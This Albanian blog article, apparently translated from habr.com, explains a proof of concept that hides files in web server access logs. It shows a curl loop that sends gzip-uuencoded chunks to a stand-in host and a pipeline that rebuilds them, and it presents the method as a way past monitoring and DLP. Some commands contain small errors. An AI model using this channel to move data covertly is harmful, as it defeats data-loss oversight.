Shkëmbimi i mesazheve sekrete përmes regjistrave të serverëve

Sipas përcaktimit në Wikipedia, një pikë takimi e fshehtë (dead drop) është një instrument konspirativ që shërben për shkëmbimin e informacionit ose sendeve ndërmjet njerëzve, të cilët përdorin një vend sekret. Kuptimi është që njerëzit kurrë nuk takohen, por ndajnë informacionin duke mbajtur sigurinë operacionale.

Pika e fshehtë nuk duhet të tërheqë vëmendjen. Prandaj, në botën offline shpesh përdoren gjëra të thjeshta: një tullë e lirë në mur, një libër në bibliotekë apo një gropë në pemë.

Në internet ka shumë mjete për enkriptim dhe anonimim, por vetë fakti i përdorimit të këtyre mjeteve tërheq vëmendjen. Për më tepër, ato mund të bllokohen në nivelin e korporatave ose shtetit. Çfarë duhet të bëjmë?

Developuesi Ryan Flowers propozon një variant interesant — të përdorim çdo server web si një pikë takimi të fshehtë. Po të mendojmë, çfarë bën një server web? Pranon kërkesa, lëshon skedarë dhe shkruan log. Dhe ai regjistron në log të gjitha kërkesat, madje edhe ato të papërshtatshme.!

Pra tregon se çdo server web-i lejon ruajtjen e një mesazhi të rastësishëm në log. Flauërs e mendoi këtë dhe si mund ta përdorim.

Ai ofron këtë mundësi:

  1. Marrim një skedar tekstual (mesazhi sekret) dhe llogarisim hashin (md5sum).
  2. E kodojmë atë (gzip+uuencode).
  3. E shkruajmë në log duke bërë një kërkesë të pabesueshme ndaj serverit.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Për të lexuar skedarin, ne duhet të kryejmë këto operacione në rendin e kundërt: të dekodojmë dhe të shtrydhim skedarin, të verifikojmë hashin (hash-i mund të transmetohet sigurt në kanale të hapura).

Hapësirat zëvendësohen me =+=, në mënyrë që adresa të mos ketë hapësira. Programi, i quajtur CurlyTP nga autori, përdor kodimin base64, si në bashkëngjitjet e emailit. Kërkesa bëhet me fjalën kyçe ?transfer?, në mënyrë që marrësi ta gjejë lehtësisht atë në log.

Çfarë shohim në log në këtë rast?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Siç është thënë më parë, për të marrë mesazhin sekret, është e nevojshme të kryhen operacionet në rendin e kundërt:

Makinë remote

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Procesi mund të automatizohet lehtësisht. Md5sum përputhet, dhe përmbajtja e skedarit konfirmon se gjithçka është dekoduar saktë.

Metoda është shumë e thjeshtë. 'Kuptimi i këtij ushtrimi është vetëm për të dëshmuar se skedarët mund të transmetohen përmes kërkesave të vogla të pafajshme në web, dhe kjo funksionon në çdo server web me ditarë teksti normal. Në thelb, secili server web është një fshehtësisht!', thotë Flowers.

Sigurisht, metoda funksionon vetëm nëse marrësi ka qasje në log-et e serverit. Por një qasje e tillë ofrohet, për shembull, nga shumë hostues.

Si ta përdorim këtë?

Ryan Flowers thotë se nuk është specialist i sigurisë informatike dhe nuk do të përgatisë një listë të mundshmeve për përdorimet e CurlyTP. Për të, kjo është thjesht një provë koncepti, që mjetet e njohura që shohim çdo ditë mund të përdoren në mënyrë jo tradicionale.

Në të vërtetë, kjo metodë ka disa përparësi mbi "fshehtësitë" e tjera të serverit si Digital Dead Drop ose PirateBox: ajo nuk kërkon konfigurim të veçantë në anën e serverit apo protokolle të veçanta — dhe nuk do të ngjallë dyshime te ata që monitorojnë trafik. Është e pamundur që sistemi i monitorimit të komunikimeve (SORM) ose sistemi DLP të skanojë URL-të për skedarë të kompresuar tekstual.

Ky është një nga mënyrat për të transmetuar mesazhe përmes skedarëve të sistemit. Mund të kujtojmë si më parë disa kompani të avancuara publikonin pjesët e punës për zhvilluesit në titujt e HTTP apo në kodin e faqeve HTML.

Shkëmbimi i mesazheve sekrete përmes regjistrave të serverëve

Ideja ishte që këtë "peshk të fshehur" ta shihnin vetëm zhvilluesit e uebit, pasi një njeri normal nuk do të shqyrtonte titujt ose kodin HTML.

Shkëmbimi i mesazheve sekrete përmes regjistrave të serverëve

Burimi: habr.com

Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS 🔥 Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS | ProHoster